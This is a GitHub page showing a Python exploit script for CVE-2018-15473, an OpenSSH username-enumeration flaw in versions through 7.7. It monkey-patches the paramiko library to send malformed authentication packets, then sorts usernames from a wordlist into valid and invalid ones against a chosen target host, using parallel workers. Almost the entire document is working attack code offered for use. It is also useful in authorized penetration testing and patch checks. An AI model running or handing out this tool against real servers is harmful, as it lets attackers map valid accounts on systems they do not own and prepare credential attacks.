forked from epi052/cve-2018-15473
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ssh-username-enum.py
executable file
·207 lines (162 loc) · 7.7 KB
/
ssh-username-enum.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
#!/usr/bin/env python3
"""
derived from work done by Matthew Daley
https://bugfuzz.com/stuff/ssh-check-username.py
props to Justin Gardner for the add_boolean workaround
CVE-2018-15473
--------------
OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an
invalid authenticating user until after the packet containing the request has been fully parsed, related to
auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
Author: epi
https://epi052.gitlab.io/notes-to-self/
https://gitlab.com/epi052/cve-2018-15473
"""
import sys
import re
import socket
import logging
import argparse
import multiprocessing
from typing import Union
from pathlib import Path
import paramiko
assert sys.version_info >= (3, 6), "This program requires python3.6 or higher"
class Color:
""" Class for coloring print statements. Nothing to see here, move along. """
BOLD = '\033[1m'
ENDC = '\033[0m'
RED = '\033[38;5;196m'
BLUE = '\033[38;5;75m'
GREEN = '\033[38;5;149m'
YELLOW = '\033[38;5;190m'
@staticmethod
def string(string: str, color: str, bold: bool = False) -> str:
""" Prints the given string in a few different colors.
Args:
string: string to be printed
color: valid colors "red", "blue", "green", "yellow"
bold: T/F to add ANSI bold code
Returns:
ANSI color-coded string (str)
"""
boldstr = Color.BOLD if bold else ""
colorstr = getattr(Color, color.upper())
return f'{boldstr}{colorstr}{string}{Color.ENDC}'
class InvalidUsername(Exception):
""" Raise when username not found via CVE-2018-15473. """
def apply_monkey_patch() -> None:
""" Monkey patch paramiko to send invalid SSH2_MSG_USERAUTH_REQUEST.
patches the following internal `AuthHandler` functions by updating the internal `_handler_table` dict
_parse_service_accept
_parse_userauth_failure
_handler_table = {
MSG_SERVICE_REQUEST: _parse_service_request,
MSG_SERVICE_ACCEPT: _parse_service_accept,
MSG_USERAUTH_REQUEST: _parse_userauth_request,
MSG_USERAUTH_SUCCESS: _parse_userauth_success,
MSG_USERAUTH_FAILURE: _parse_userauth_failure,
MSG_USERAUTH_BANNER: _parse_userauth_banner,
MSG_USERAUTH_INFO_REQUEST: _parse_userauth_info_request,
MSG_USERAUTH_INFO_RESPONSE: _parse_userauth_info_response,
}
"""
def patched_add_boolean(*args, **kwargs):
""" Override correct behavior of paramiko.message.Message.add_boolean, used to produce malformed packets. """
auth_handler = paramiko.auth_handler.AuthHandler
old_msg_service_accept = auth_handler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
def patched_msg_service_accept(*args, **kwargs):
""" Patches paramiko.message.Message.add_boolean to produce a malformed packet. """
old_add_boolean, paramiko.message.Message.add_boolean = paramiko.message.Message.add_boolean, patched_add_boolean
retval = old_msg_service_accept(*args, **kwargs)
paramiko.message.Message.add_boolean = old_add_boolean
return retval
def patched_userauth_failure(*args, **kwargs):
""" Called during authentication when a username is not found. """
raise InvalidUsername(*args, **kwargs)
auth_handler._client_handler_table.update({
paramiko.common.MSG_SERVICE_ACCEPT: patched_msg_service_accept,
paramiko.common.MSG_USERAUTH_FAILURE: patched_userauth_failure
})
def create_socket(hostname: str, port: int) -> Union[socket.socket, None]:
""" Small helper to stay DRY.
Returns:
socket.socket or None
"""
# spoiler alert, I don't care about the -6 flag, it's really
# just to advertise in the help that the program can handle ipv6
try:
return socket.create_connection((hostname, port))
except socket.error as e:
print(f'socket error: {e}', file=sys.stdout)
def connect(username: str, hostname: str, port: int, verbose: bool = False, **kwargs) -> None:
""" Connect and attempt keybased auth, result interpreted to determine valid username.
Args:
username: username to check against the ssh service
hostname: hostname/IP of target
port: port where ssh is listening
key: key used for auth
verbose: bool value; determines whether to print 'not found' lines or not
Returns:
None
"""
sock = create_socket(hostname, port)
if not sock:
return
transport = paramiko.transport.Transport(sock)
try:
transport.start_client()
except paramiko.ssh_exception.SSHException:
return print(Color.string(f'[!] SSH negotiation failed for user {username}.', color='red'))
try:
transport.auth_publickey(username, paramiko.RSAKey.generate(1024))
except paramiko.ssh_exception.AuthenticationException:
print(f"[+] {Color.string(username, color='yellow')} found!")
except InvalidUsername:
if not verbose:
return
print(f'[-] {Color.string(username, color="red")} not found')
def main(**kwargs):
""" main entry point for the program """
sock = create_socket(kwargs.get('hostname'), kwargs.get('port'))
if not sock:
return
banner = sock.recv(1024).decode()
regex = re.search(r'-OpenSSH_(?P<version>\d\.\d)', banner)
if regex:
try:
version = float(regex.group('version'))
except ValueError:
print(f'[!] Attempted OpenSSH version detection; version not recognized.\n[!] Found: {regex.group("version")}')
else:
if version <=7.7:
ver_clr = 'green'
print(f"[+] {Color.string('OpenSSH', color=ver_clr)} version {Color.string(version, color=ver_clr)} found")
else:
ver_clr = 'red'
print(f"[+] {Color.string('OpenSSH', color=ver_clr)} version {Color.string(version, color=ver_clr)} found! Vuln will not work with OpenSSH Versions 7.8+")
else:
print(f'[!] Attempted OpenSSH version detection; version not recognized.\n[!] Found: {Color.string(banner, color="yellow")}')
apply_monkey_patch()
if kwargs.get('username'):
kwargs['username'] = kwargs.get('username').strip()
return connect(**kwargs)
with multiprocessing.Pool(kwargs.get('threads')) as pool, Path(kwargs.get('wordlist')).open() as usernames:
host = kwargs.get('hostname')
port = kwargs.get('port')
verbose = kwargs.get('verbose')
pool.starmap(connect, [(user.strip(), host, port, verbose) for user in usernames])
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="OpenSSH Username Enumeration (CVE-2018-15473)")
parser.add_argument('hostname', help='target to enumerate', type=str)
parser.add_argument('-p', '--port', help='ssh port (default: 22)', default=22, type=int)
parser.add_argument('-t', '--threads', help="number of threads (default: 4)", default=4, type=int)
parser.add_argument('-v', '--verbose', action='store_true', default=False,
help="print both valid and invalid usernames (default: False)")
parser.add_argument('-6', '--ipv6', action='store_true', help="Specify use of an ipv6 address (default: ipv4)")
multi_or_single_group = parser.add_mutually_exclusive_group(required=True)
multi_or_single_group.add_argument('-w', '--wordlist', type=str, help="path to wordlist")
multi_or_single_group.add_argument('-u', '--username', help='a single username to test', type=str)
args = parser.parse_args()
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
main(**vars(args))